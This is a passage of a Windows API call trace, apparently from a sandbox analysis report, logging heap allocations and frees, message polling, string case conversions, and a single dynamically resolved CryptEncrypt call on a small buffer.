RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0223.922] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0223.922] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0223.922] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69af0 | out: hHeap=0x2af0000) returned 1 [0223.922] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7040 | out: hHeap=0x2af0000) returned 1 [0223.922] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8a8 [0223.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7b8 [0223.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d78 [0223.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7200 [0223.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 0x2a69b50 [0223.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0223.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c78 [0223.922] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0223.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0223.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d08 [0223.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0223.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab830 [0223.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d28 [0223.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab908 [0223.923] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0223.923] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab908 | out: hHeap=0x2af0000) returned 1 [0223.923] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab830 | out: hHeap=0x2af0000) returned 1 [0223.923] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0223.923] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0223.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0223.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cd8 [0223.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab908 [0223.923] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0223.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71d28 [0223.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d58 [0223.923] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab908 | out: hHeap=0x2af0000) returned 1 [0223.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cd8 [0223.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71d08 [0223.923] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0223.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0223.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69b50 | out: hHeap=0x2af0000) returned 1 [0223.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7200 | out: hHeap=0x2af0000) returned 1 [0223.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7b8 | out: hHeap=0x2af0000) returned 1 [0223.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0223.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0223.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0223.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0223.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8a8 | out: hHeap=0x2af0000) returned 1 [0223.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0223.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0223.924] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71be8 [0223.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0223.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0223.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d08 [0223.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0223.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d28 [0223.924] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0223.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0223.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0223.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab830 [0223.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0223.924] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ba8 [0223.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c68 [0223.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7b8 [0223.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab908 [0223.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d58 [0223.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0223.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0223.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cd8 [0223.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0223.925] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0223.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782a0 | out: hHeap=0x2af0000) returned 1 [0223.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0223.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0223.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab908 | out: hHeap=0x2af0000) returned 1 [0223.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7b8 | out: hHeap=0x2af0000) returned 1 [0223.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0223.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0223.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0223.925] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0223.925] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ca8 [0223.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d28 [0223.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7b8 [0223.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0223.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bf8 [0223.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab878 [0223.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0223.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab878 | out: hHeap=0x2af0000) returned 1 [0223.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0223.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7b8 | out: hHeap=0x2af0000) returned 1 [0223.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0223.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0223.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0223.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab830 | out: hHeap=0x2af0000) returned 1 [0223.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0223.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab908 [0223.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d58 [0223.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab830 [0223.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0223.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7b8 [0223.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bf8 [0223.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0223.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0223.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab878 [0223.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c28 [0223.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8a8 [0223.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0223.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0223.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0223.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0223.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d08 [0223.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0223.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0223.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d08 [0223.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0223.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0223.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0223.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d28 [0223.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0223.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9b0 [0223.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0223.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0223.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9b0 | out: hHeap=0x2af0000) returned 1 [0223.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0223.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0223.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0223.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0223.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0223.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0223.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0223.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabbf0 | out: hHeap=0x2af0000) returned 1 [0223.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb18 | out: hHeap=0x2af0000) returned 1 [0223.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc38 | out: hHeap=0x2af0000) returned 1 [0223.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0223.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0223.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0223.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0223.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0223.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabae8 | out: hHeap=0x2af0000) returned 1 [0223.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0223.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0223.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabba8 | out: hHeap=0x2af0000) returned 1 [0223.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabab8 | out: hHeap=0x2af0000) returned 1 [0223.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0223.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0223.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0223.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0223.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc68 | out: hHeap=0x2af0000) returned 1 [0223.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0223.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69b80 | out: hHeap=0x2af0000) returned 1 [0223.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70e0 | out: hHeap=0x2af0000) returned 1 [0223.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabae8 | out: hHeap=0x2af0000) returned 1 [0223.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabab8 | out: hHeap=0x2af0000) returned 1 [0223.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0223.928] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0223.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabbd8 | out: hHeap=0x2af0000) returned 1 [0223.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0223.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabcf8 | out: hHeap=0x2af0000) returned 1 [0223.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0223.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabcf8 | out: hHeap=0x2af0000) returned 1 [0223.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0223.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabbd8 | out: hHeap=0x2af0000) returned 1 [0223.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0223.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc68 | out: hHeap=0x2af0000) returned 1 [0223.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0223.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb00 | out: hHeap=0x2af0000) returned 1 [0223.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0223.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb00 | out: hHeap=0x2af0000) returned 1 [0223.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0223.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb30 | out: hHeap=0x2af0000) returned 1 [0223.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0223.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb00 | out: hHeap=0x2af0000) returned 1 [0223.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0223.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb30 | out: hHeap=0x2af0000) returned 1 [0223.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0223.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabae8 | out: hHeap=0x2af0000) returned 1 [0223.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabae8 | out: hHeap=0x2af0000) returned 1 [0223.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0223.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb00 | out: hHeap=0x2af0000) returned 1 [0223.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0223.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb00 | out: hHeap=0x2af0000) returned 1 [0223.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0223.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabcf8 | out: hHeap=0x2af0000) returned 1 [0223.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0223.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabae8 | out: hHeap=0x2af0000) returned 1 [0223.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0223.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc20 | out: hHeap=0x2af0000) returned 1 [0223.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0223.930] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0223.930] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aabae8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0223.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabae8 | out: hHeap=0x2af0000) returned 1 [0223.930] GetProcAddress (hModule=0x76390000, lpProcName="CryptEncrypt") returned 0x763c2cf0 [0223.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabcf8 | out: hHeap=0x2af0000) returned 1 [0223.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0223.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0223.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0223.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0223.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0223.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0223.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0223.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0223.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782a0 | out: hHeap=0x2af0000) returned 1 [0223.930] CryptEncrypt (in: hKey=0x9e1c38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2a71c58*, pdwDataLen=0x8cef60*=0x0, dwBufLen=0x8 | out: pbData=0x2a71c58*, pdwDataLen=0x8cef60*=0x8) returned 1 [0223.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabcf8 | out: hHeap=0x2af0000) returned 1 [0223.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0223.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabae8 | out: hHeap=0x2af0000) returned 1 [0223.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabcf8 | out: hHeap=0x2af0000) returned 1 [0223.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0223.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabae8 | out: hHeap=0x2af0000) returned 1 [0223.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb00 | out: hHeap=0x2af0000) returned 1 [0223.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0223.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabae8 | out: hHeap=0x2af0000) returned 1 [0223.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb00 | out: hHeap=0x2af0000) returned 1 [0223.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0223.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc68 | out: hHeap=0x2af0000) returned 1 [0223.931] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.931] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.931] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.931] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.931] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.931] PeekMessageW 